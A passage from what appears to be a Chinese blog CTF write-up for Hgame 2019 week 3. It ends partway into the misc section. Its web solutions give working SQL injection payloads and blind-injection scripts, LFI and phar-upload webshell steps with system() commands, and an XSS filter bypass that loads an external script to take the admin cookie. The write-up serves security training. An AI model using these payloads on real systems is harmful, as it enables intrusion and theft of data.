<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="杭电Hgame2019-week3-WP"><meta name="keywords" content="RCE,XSS,文件上传"><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>杭电Hgame2019-week3-WP | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A5%9E%E5%A5%87%E7%9A%84MD5"><span class="toc-text">神奇的MD5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-1"><span class="toc-text">sqli-1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sqli-2"><span class="toc-text">sqli-2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E6%B8%97%E9%80%8F"><span class="toc-text">基础渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BabyXss"><span class="toc-text">BabyXss</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Misc"><span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%87%B3%E5%B0%91%E5%83%8F%E9%82%A3%E9%9B%AA%E4%B8%80%E6%A0%B7"><span class="toc-text">至少像那雪一样</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A7%E6%97%B6%E8%AE%B0%E5%BF%86"><span class="toc-text">旧时记忆</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%AC%E5%90%AC%E9%9F%B3%E4%B9%90%EF%BC%9F"><span class="toc-text">听听音乐？</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto"><span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#P4ndd-n"><span class="toc-text">P4ndd!n@!</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#babyRSA"><span class="toc-text">babyRSA</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#basicmath"><span class="toc-text">basicmath</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">58</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">31</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">杭电Hgame2019-week3-WP</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-02-15</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF/">CTF</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">3k</span><span class="post-meta__separator">|</span><span>阅读时长: 13 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="神奇的MD5"><a href="#神奇的MD5" class="headerlink" title="神奇的MD5"></a>神奇的MD5</h2><blockquote>
<p>Description<br>flag在根目录下(请善待学生机)<br>hint:md5碰撞 你自己本地去生成3个md5值一样的 sha值不一样的 用curl上传<br>URL <a target="_blank" rel="noopener" href="http://118.25.89.91:8080/question/login.php">http://118.25.89.91:8080/question/login.php</a></p>
</blockquote>
<p>首先发现源码泄露 <code>.login.php.swp</code> </p>
<p><code>vim -r</code>恢复出源码</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">session_start();</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (@$_POST[<span class="string">&#x27;username&#x27;</span>] <span class="keyword">and</span> @$_POST[<span class="string">&#x27;password&#x27;</span>] <span class="keyword">and</span> @$_POST[<span class="string">&#x27;code&#x27;</span>])</span><br><span class="line">    &#123;</span><br><span class="line">        $username = (<span class="keyword">string</span>)$_POST[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">        $password = (<span class="keyword">string</span>)$_POST[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">        $code     = (<span class="keyword">string</span>)$_POST[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (($username == $password ) <span class="keyword">or</span> ($username == $code)  <span class="keyword">or</span> ($password == $code)) &#123; </span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;Your input can&#x27;t be the same&quot;</span>;</span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span> ((md5($username) === md5($password)) <span class="keyword">and</span> (md5($password) === md5($code)))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;Good&quot;</span>; </span><br><span class="line"></span><br><span class="line">            header(<span class="string">&#x27;Location: admin.php&#x27;</span>);  </span><br><span class="line">            <span class="keyword">exit</span>();</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt; Invalid password&lt;/pre&gt;&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// ...[OMITTED]...</span></span><br></pre></td></tr></table></figure>

<p>要求提交三个内容不同而 MD5 哈希值相同的字符串进行登录，由于对参数进行强制类型转换且使用全等进行判断，无法通过一般的数组参数、0e 开头 MD5 等方法绕过。</p>
<p>只能通过 MD5 碰撞的方法，使用 <a target="_blank" rel="noopener" href="https://github.com/upbit/clone-fastcoll">fastcoll</a> 或 <a target="_blank" rel="noopener" href="https://github.com/thereal1024/python-md5-collision">thereal1024/python-md5-collision</a> 生成一些文件</p>
<p>选三个文件将其内容编码后用于登录，成功后跳转至 admin.php，是一个 webshell</p>
<p><img src="https://i.loli.net/2019/02/23/5c70ad5cd25e1.png"></p>
<p>通过 <code>ls /</code> 命令可以看到 /flag，但直接 <code>cat /flag</code> 会提示无法获取</p>
<p>读一下 admin.php ，发现其中对输入的命令有过滤：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>($_SERVER[<span class="string">&#x27;REQUEST_METHOD&#x27;</span>] === <span class="string">&#x27;POST&#x27;</span> &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">        $cmd = (<span class="keyword">string</span>)$_POST[<span class="string">&#x27;command&#x27;</span>];</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt;The Command is : $cmd &lt;/p&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;</span><br><span class="line">	$cmd = str_replace(<span class="string">&quot;flag&quot;</span>,<span class="string">&#x27;none&#x27;</span>,$cmd);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;p&gt;Result is :&quot;</span>;system($cmd); <span class="string">&quot;&lt;/p&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;script&gt;alert(&#x27;Login First&#x27;)&lt;/script&gt;&quot;</span>;</span><br><span class="line">    header(<span class="string">&#x27;Location: login.php&#x27;</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>执行 <code>cat /fla?</code> 即可读取 flag</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">hgame&#123;a1c83b66cc504d583c09ea6c20c0dabc&#125;</span><br></pre></td></tr></table></figure>



<h2 id="sqli-1"><a href="#sqli-1" class="headerlink" title="sqli-1"></a>sqli-1</h2><p>数字型注入，简单的union注入就可以了，没有任何过滤。只有一个md5的类似验证码的code，python生成一下也很容易。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getmd5</span>(<span class="params">code</span>):</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">999999</span>):</span><br><span class="line">		temp = hashlib.md5(str(i)).hexdigest()</span><br><span class="line">		<span class="keyword">if</span> temp[<span class="number">0</span>:<span class="number">4</span>] == code:</span><br><span class="line">			<span class="keyword">return</span> i</span><br><span class="line">			</span><br><span class="line"><span class="keyword">print</span> getmd5(<span class="string">&#x27;43dd&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&amp;id&#x3D;-1 union select database() #            			hgame</span><br><span class="line">&amp;id&#x3D;-1 union select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database() #								  f1l1l1l1g,words</span><br><span class="line">&amp;id&#x3D;-1 union select group_concat(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&#39;f1l1l1l1g&#39;#		f14444444g</span><br><span class="line">&amp;id&#x3D;-1 union select f14444444g from f1l1l1l1g#			hgame&#123;sql1_1s_iNterest1ng&#125;</span><br></pre></td></tr></table></figure>



<h2 id="sqli-2"><a href="#sqli-2" class="headerlink" title="sqli-2"></a>sqli-2</h2><p>由于没有回显，只能盲注，又注意到不论返回结果如何，只要SQL语句没有语法错误就会显示<code>sql execute</code>，于是只能进行时间盲注：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># coding:utf-8</span><br><span class="line"># __author__ &#x3D; V0W</span><br><span class="line"></span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line">import hashlib</span><br><span class="line">import string</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">guess &#x3D; string.printable[:95]</span><br><span class="line"># print guess</span><br><span class="line">url &#x3D; &quot;http:&#x2F;&#x2F;118.89.111.179:3001&quot;</span><br><span class="line">sess &#x3D; requests.session()</span><br><span class="line"></span><br><span class="line">def getmd5(code):</span><br><span class="line">	for i in range(999999):</span><br><span class="line">		temp &#x3D; hashlib.md5(str(i)).hexdigest()</span><br><span class="line">		if temp[0:4] &#x3D;&#x3D; code:</span><br><span class="line">			return i</span><br><span class="line"></span><br><span class="line">def md5(code):</span><br><span class="line">	temp &#x3D; hashlib.md5(str(code)).hexdigest()</span><br><span class="line">	return temp</span><br><span class="line"></span><br><span class="line">def main():</span><br><span class="line">	flag &#x3D; &#39;&#39;</span><br><span class="line">	for i in range(1,40):</span><br><span class="line">		for c in guess:</span><br><span class="line">			url &#x3D; &quot;http:&#x2F;&#x2F;118.89.111.179:3001&quot;</span><br><span class="line">			r &#x3D; sess.get(url).text</span><br><span class="line">			# print r</span><br><span class="line">			targetmd5 &#x3D; r[79:83]</span><br><span class="line">			# print targetmd5</span><br><span class="line">			code &#x3D; getmd5(targetmd5)</span><br><span class="line">			url &#x3D; url + &quot;?code&#x3D;&quot; + str(code)</span><br><span class="line">			# payload &#x3D; &quot;&amp;id&#x3D;1 and if((length(database())&#x3D;%s),sleep(5),1)#&quot; %c</span><br><span class="line">			# payload &#x3D; &quot;&amp;id&#x3D;1 and if((substr((database()),%d,1)&#x3D;&#39;%s&#39;),sleep(5),1)#&quot; %(i,c)</span><br><span class="line">			# payload &#x3D; &quot;&amp;id&#x3D;1 and if((substr((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),%d,1)&#x3D;&#39;%s&#39;),sleep(5),1)#&quot; % (i,c)</span><br><span class="line">			# payload &#x3D; &quot;&amp;id&#x3D;1 and if((substr((select group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;F11111114G&#39;),%d,1)&#x3D;&#39;%s&#39;),sleep(5),1)#&quot; % (i,c)</span><br><span class="line">			payload &#x3D; &quot;&amp;id&#x3D;1 and if((substr((select fL4444Ag from F11111114G limit 0,1),%d,1)&#x3D;&#39;%s&#39;),sleep(5),1)#&quot; % (i,c)</span><br><span class="line">			# print payload</span><br><span class="line">			url &#x3D; url + payload</span><br><span class="line">			# print url        </span><br><span class="line">			time_start &#x3D; time.time()</span><br><span class="line">			content &#x3D; sess.get(url).content</span><br><span class="line">			print content</span><br><span class="line">			time_end &#x3D; time.time()</span><br><span class="line">			timedif &#x3D; time_end - time_start</span><br><span class="line">			print timedif</span><br><span class="line">			if timedif &gt;&#x3D; 4.5:</span><br><span class="line">			    flag +&#x3D; c</span><br><span class="line">			    print flag</span><br><span class="line">			    break</span><br><span class="line"></span><br><span class="line">main()</span><br><span class="line"></span><br><span class="line"># -------盲注得到的数据库信息----------</span><br><span class="line"># dblen: 5</span><br><span class="line"># dbnmae: hgame</span><br><span class="line"># tbname: F11111114G,words</span><br><span class="line"># colname: fL4444Ag</span><br><span class="line"># flag: hgame&#123;sqli_1s_s0_s0_s0_s0_interesting&#125;</span><br></pre></td></tr></table></figure>



<h2 id="基础渗透"><a href="#基础渗透" class="headerlink" title="基础渗透"></a>基础渗透</h2><p>非常完整且有一定难度的题目，考察点多，先膜一下出题师傅。</p>
<p>一个包含以下功能的 web 应用：</p>
<ul>
<li>用户注册、登录、上传头像、更改密码</li>
<li>留言查看、新建、删除</li>
</ul>
<p>首先注册账号，登录后尝试一下各种功能，发现显示不同的页面是根据 <code>index.php?action=user</code> 中的 action 参数来切换的，直接访问 user.php 可以返回一部分 HTML，但是不如之前全。</p>
<p><img src="https://i.loli.net/2019/02/23/5c709fa594c57.png"></p>
<p><img src="https://i.loli.net/2019/02/23/5c709f8015047.png"></p>
<p>猜测在 index.php 中是通过 require 或 include 相应的文件来显示不同的页面，存在本地文件包含漏洞</p>
<p>利用LFI可以读出全部源码<code>http://111.231.140.29:10080/index.php?action=php://filter/read=convert.base64-encode/resource=index</code></p>
<p>同理，拿下其他代码。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">login.php	register.php	index.php	user.php	message.php</span><br><span class="line">messages_api.php	functions.php	config.php</span><br></pre></td></tr></table></figure>

<p>关键代码在<code>functions.php</code>：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">upload_avatar</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $type = $_FILES[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>];</span><br><span class="line">    $user_id = $_SESSION[<span class="string">&#x27;user_id&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> ($type == <span class="string">&#x27;image/gif&#x27;</span> || $type == <span class="string">&#x27;image/jpeg&#x27;</span> || $type == <span class="string">&#x27;image/png&#x27;</span>) &#123;</span><br><span class="line">        $avatar = get_avatar($user_id);</span><br><span class="line">        <span class="keyword">if</span> ($avatar == <span class="literal">null</span>) &#123;</span><br><span class="line">            $name = rand_filename();</span><br><span class="line">            move_uploaded_file($_FILES[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="string">&quot;./img/avatar/&quot;</span> . $name . <span class="string">&quot;.png&quot;</span>);</span><br><span class="line">            $sql_query = <span class="string">&quot;update `users` set `avatar`=&#x27;$name&#x27; WHERE `user_id`=$user_id&quot;</span>;</span><br><span class="line">            sql_query($sql_query);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            move_uploaded_file($_FILES[<span class="string">&#x27;file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="string">&quot;./img/avatar/&quot;</span> . $avatar[<span class="string">&#x27;name&#x27;</span>] . <span class="string">&quot;.png&quot;</span>);</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">rand_filename</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $tmp = `cat /dev/urandom | head -n <span class="number">10</span> | md5sum | head -c <span class="number">15</span>`;</span><br><span class="line">    $sql_query = <span class="string">&quot;select `avatar` from `users` where `avatar`=$tmp&quot;</span>;</span><br><span class="line">    $res = sql_query($sql_query);</span><br><span class="line">    <span class="keyword">if</span> ($res-&gt;num_rows) &#123;</span><br><span class="line">        <span class="keyword">return</span> rand_filename();</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> $tmp;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在管理页面（<code>index.php?action=user</code>）可以上传新头像（<code>upload_avatar()</code>）存在一个上传漏洞，可以以此来getshell，但是命名规则是随机的（<code>rand_filename</code>）。</p>
<p>但是注意到存在SQL注入，找了一个比较容易注入的点<code>delete_message</code>,在messge_id处进行注入。通过该注入可以得到本用户头像的文件名（15位的随机字符串），文件为 <code>./img/avatar/*.png</code>。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">delete_message</span>(<span class="params">$message_id</span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $user_id = $_SESSION[<span class="string">&#x27;user_id&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span> ($_POST[<span class="string">&#x27;token&#x27;</span>] === $_SESSION[<span class="string">&#x27;token&#x27;</span>]) &#123;</span><br><span class="line">        <span class="keyword">if</span> ($_SESSION[<span class="string">&#x27;groups&#x27;</span>] == <span class="number">0</span>) &#123;</span><br><span class="line">            $sql_query = <span class="string">&quot;delete from `messages` where `message_id`=$message_id and `user_id`=$user_id&quot;</span>;</span><br><span class="line">        &#125; <span class="keyword">elseif</span> ($_SESSION[<span class="string">&#x27;groups&#x27;</span>] == <span class="number">1</span>) &#123;</span><br><span class="line">            $sql_query = <span class="string">&quot;delete from `messages` where `message_id`=$message_id&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        sql_query($sql_query);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>于是利用这个删除信息的注入点，尝试盲注读文件名，盲注脚本如下：</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding: utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">flag=<span class="string">&#x27;&#x27;</span></span><br><span class="line">restr = <span class="string">&quot;&lt;input type=&#x27;hidden&#x27; value=&#x27;(.*?)&#x27; id=&#x27;token&#x27;&quot;</span></span><br><span class="line">url = <span class="string">&#x27;http://111.231.140.29:10080/index.php&#x27;</span></span><br><span class="line">cookie = &#123;</span><br><span class="line">    <span class="string">&#x27;PHPSESSID&#x27;</span>:<span class="string">&#x27;5qe3nisl6jg15e8rj980l6jlah&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;user&#x27;</span>:<span class="string">&#x27;v0w&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;groups&#x27;</span>:<span class="string">&#x27;0&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">url2 = <span class="string">&#x27;http://111.231.140.29:10080/messages_api.php?action=delete&#x27;</span></span><br><span class="line">url3 = <span class="string">&#x27;http://111.231.140.29:10080/messages_api.php?action=add&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">100</span>):</span><br><span class="line">	<span class="keyword">print</span> i</span><br><span class="line">	<span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">33</span>,<span class="number">127</span>):</span><br><span class="line">		r = requests.get(url=url,cookies=cookie)</span><br><span class="line">		token = re.findall(restr,r.content.decode(<span class="string">&#x27;utf-8&#x27;</span>))[<span class="number">0</span>]</span><br><span class="line">        <span class="comment"># token会失效，需要每次请求拿token</span></span><br><span class="line">		<span class="comment"># payload = &quot;-1 or if((ascii(substr((database()),%d,1))=%d),sleep(5),0)#&quot;%(i,j)</span></span><br><span class="line">		payload = <span class="string">&quot;-1 or if((ascii(substr((select avatar from users where username like 0x763077),%d,1))=%d),sleep(5),0)#&quot;</span>%(i,j)</span><br><span class="line">		data = &#123;</span><br><span class="line">			<span class="string">&#x27;message_id&#x27;</span>:payload,</span><br><span class="line">			<span class="string">&#x27;token&#x27;</span>:token</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">try</span>:</span><br><span class="line">			r = requests.post(data=data,cookies=cookie,url=url2,timeout=<span class="number">4.5</span>)</span><br><span class="line">		<span class="keyword">except</span>:</span><br><span class="line">			flag += chr(j)</span><br><span class="line">			<span class="keyword">print</span> flag</span><br><span class="line">            <span class="comment"># 因为是删除的注入点，成功时会将message删除，需要写新的message</span></span><br><span class="line">			r = requests.get(url=url, cookies=cookie)</span><br><span class="line">			token = re.findall(restr, r.content.decode(<span class="string">&#x27;utf-8&#x27;</span>))[<span class="number">0</span>]</span><br><span class="line">			data = &#123;</span><br><span class="line">				<span class="string">&#x27;new_message&#x27;</span>: <span class="string">&#x27;test&#x27;</span>,</span><br><span class="line">				<span class="string">&#x27;token&#x27;</span>: token</span><br><span class="line">			&#125;</span><br><span class="line">			r = requests.post(data=data,cookies=cookie,url=url3)</span><br><span class="line">			<span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#=========注入信息==========</span></span><br><span class="line"><span class="comment"># DB: lyb</span></span><br><span class="line"><span class="comment"># Picname: eda47772498d3bc</span></span><br></pre></td></tr></table></figure>

<p>可以上传含有恶意代码的 php 文件来进行进一步渗透，而要使上传的头像（.png 文件）被解析为 php 执行，需要用到 index.php 中的本地文件包含漏洞（<code>require $page .&#39;.php&#39;;</code>）</p>
<p>由于强制在参数后添加 “.php”，而头像文件以 “.png” 结尾，</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$page = array_key_exists(<span class="string">&#x27;action&#x27;</span>, $_GET) ? $_GET[<span class="string">&#x27;action&#x27;</span>] : <span class="string">&#x27;message&#x27;</span>;</span><br><span class="line"><span class="keyword">require</span> $page .<span class="string">&#x27;.php&#x27;</span>;</span><br><span class="line"><span class="keyword">include_once</span>(<span class="string">&quot;template/footer.php&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>可以将 php 文件添加至 zip 压缩包上传，然后通过 <code>phar</code>协议使其被包含（<code>index.php?action=phar://img/avatar/eda47772498d3bc.png/v</code>）  </p>
<p>因为代码对文件的判断只做了<code>File-type</code>的判断，很容易绕过，拿到shell：</p>
<p><img src="https://i.loli.net/2019/02/23/5c70abf41ffe9.png"></p>
<p>找flag</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">v&#x3D;system(&#39;find &#x2F; -name flag&#39;);</span><br><span class="line">&#x2F;usr&#x2F;lib&#x2F;flag &#x2F;usr&#x2F;lib&#x2F;flag&#x2F;flag</span><br></pre></td></tr></table></figure>

<p>直接读发现没法读，但是发现同目录中有一个<code>get_flag</code></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">v&#x3D;system(&quot;ls &#x2F;usr&#x2F;lib&#x2F;flag&quot;);</span><br><span class="line">flag get_flag</span><br></pre></td></tr></table></figure>

<p>根据题目提示，可以通过<code>gte_flag</code>来读flag。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">v&#x3D;system(&quot;&#x2F;usr&#x2F;lib&#x2F;flag&#x2F;get_flag &#x2F;usr&#x2F;lib&#x2F;flag&#x2F;flag&quot;);</span><br><span class="line">hgame&#123;e4616b38e22d1a22cedc53a90cfaa87f75ccbfe565399857a390950a58a94e68&#125;</span><br></pre></td></tr></table></figure>



<h2 id="BabyXss"><a href="#BabyXss" class="headerlink" title="BabyXss"></a>BabyXss</h2><blockquote>
<p>Description<br>save按钮尝试xss(尝试过程不需要输验证码)，成功后带上验证码code，submit按钮提交xss语句；flag在admin的cookie里面,格式hgame{xxxxx}。<br>URL <a target="_blank" rel="noopener" href="http://118.25.18.223:9000/index.php">http://118.25.18.223:9000/index.php</a></p>
</blockquote>
<p>waf是将<code>&lt;/srcipt&gt;</code>替换成空。双写即可绕过</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;script src&#x3D;[url]&gt;&lt;&#x2F;scr&lt;&#x2F;script&gt;ipt&gt;</span><br></pre></td></tr></table></figure>

<p>flag</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">hgame&#123;Xss_1s_funny&#125;</span><br></pre></td></tr></table></figure>



<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="至少像那雪一样"><a href="#至少像那雪一样" class="headerlink" title="至少像那雪一样"></a>至少像那雪一样</h2><blockquote>
<p>Description<br>出题人想不好题目描述了<br>URL <a target="_blank" rel="noopener" href="http://plqfgjy5a.bkt.clouddn.com/%E8%87%B3%E5%B0%91%E5%83%8F%E9%82%A3%E9%9B%AA%E4%B8%80%E6%A0%B7.jpg">http://plqfgjy5a.bkt.clouddn.com/%E8%87%B3%E5%B0%91%E5%83%8F%E9%82%A3%E9%9B%AA%E4%B8%80%E6%A0%B7.jpg</a></p>
</blockquote>
<p>一张图片，binwalk看了一眼发现里面有压缩包，所以直接改后缀为.zip试了一下，发现压缩包有加密，拖进HxD发现并不是伪加密，也没有发现密码有关的信息，于是就考虑了一下CRC32明文攻击，用foremost分离出原图片和压缩包，发现原图片zip压缩后的CRC32值和压缩包里的图片的值是一样的，于是就用工具进行明文攻击。。</p>
<p>跑了一个多小时，成功的得到解密之后的压缩包，这时发现了一个240字节的空txt文件，于是拖进HxD,</p>
<p><img src="https://i.loli.net/2019/02/23/5c70aeab0e79c.png"></p>
<p>刚开始认为是敲击码，但是发现数目并不成对，匹配不上。。后来脑洞了一下，将09看作0，20看作1，组成一串二进制，</p>
